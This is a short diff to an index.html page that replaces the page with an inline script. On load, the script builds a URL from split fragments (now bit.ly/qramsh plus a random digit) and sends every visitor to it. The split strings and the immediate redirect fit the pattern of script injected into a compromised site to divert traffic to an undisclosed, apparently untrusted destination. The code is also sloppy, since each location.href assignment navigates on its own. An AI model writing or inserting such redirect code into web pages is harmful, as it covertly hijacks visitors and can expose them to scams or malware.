--- a/index.html
+++ b/index.html
@@ -1,14 +1,11 @@
 <script type = "text/javascript">
 function reDirect() {
-a = location.href = "bit-urls.com/";
-b = location.href = "orlink";
-c = location.href = "20v";
-d = Math.ceil(Math.random() * 1);
+a = location.href = "bit.ly/";
+b = location.href = "qra";
+c = location.href = "msh";
+d = Math.ceil(Math.random() * 3);
 a = "http://" + a + b + c + d ;
 window.location = a
 }
 reDirect();
 </script>
-
-
-
